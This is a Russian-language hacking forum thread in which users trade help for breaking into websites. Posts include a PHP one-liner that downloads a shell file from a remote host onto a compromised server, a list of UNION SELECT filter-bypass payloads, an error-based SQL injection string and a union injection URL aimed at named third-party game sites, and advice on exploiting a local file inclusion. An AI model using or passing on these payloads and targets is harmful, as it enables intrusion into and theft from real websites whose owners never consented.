kyboe, есть админка? Если есть, то в чем проблема? Если нет, то делай уроки Einstein, скинь сайт в ЛС, разберусь. Люди! Как найти шелл, если сервер WINDOWS? grep, find это никсовые...
залил шелл но как тепреь залить нормальный шелл туда? с помощью этого минишелла?? подскажите плс в пм буду оч признателен
file_put_contents('yashell.php', file_get_contents('http://ya.ru/shell.txt')); Это если url_fopen еще разрешен.
Warning: include() [function.include]: Failed opening 'sn/6616dfgh.htm' for inclusion (include_path='.:/usr/lib/php:/usr/local/lib/php') in /home/fluke/public_html/news_manager.php on line 11 Как бы намекает что это Local File Inclusion (LFI), где к подключаемым станицам добавляется .htm
кто нибудь знает онлайновый кодер из str скажем в char например asd = CHAR(97,115,100) мне надо в binary или нех вида 0x123834756
спасибо а можно ли обойти фильтрацию слов union+select+ видом +0x556e696f6e+0x53654c656374+ скобки тоже фильтруются если нет то как по другому? Точнее фильтруется Union
/*!union*/+/*!select*/ union%0aselect /*!UnIoN+SeLeCt*/ UnIoN/**/SeLeCt %75%6e%69%6f%6e%2b%73%65%6c%65%63%74 asdunionasdselectasd %75%6e%69%6f%6e%0a%73%65%6c%65%63%74
PHP: regexp code(1) : eval()'d code on line 1 пишет ошибку вероятно из за кавычек как мне это убрать?
http://la2.war-top.ru/index.php?do=sitedetails&id=186' or 1 group by concat(version(),floor(rand(0)*2)) having min(0) or 1 -- - а дальше сам. хинт: error based.
Зачем $_GET юзаете? =/ Другой масив используйте, или накрайняк $_REQUEST уж так надо $_GET оставить. _https://rdot.org/forum/showthread.php?t=118 2-пост
в этом параметре инъекции нет. зато есть в другом: http://la2-shop.ru/categories.php?id_msg=2'+union+select+1,2,3--+ вывод в тайтле.
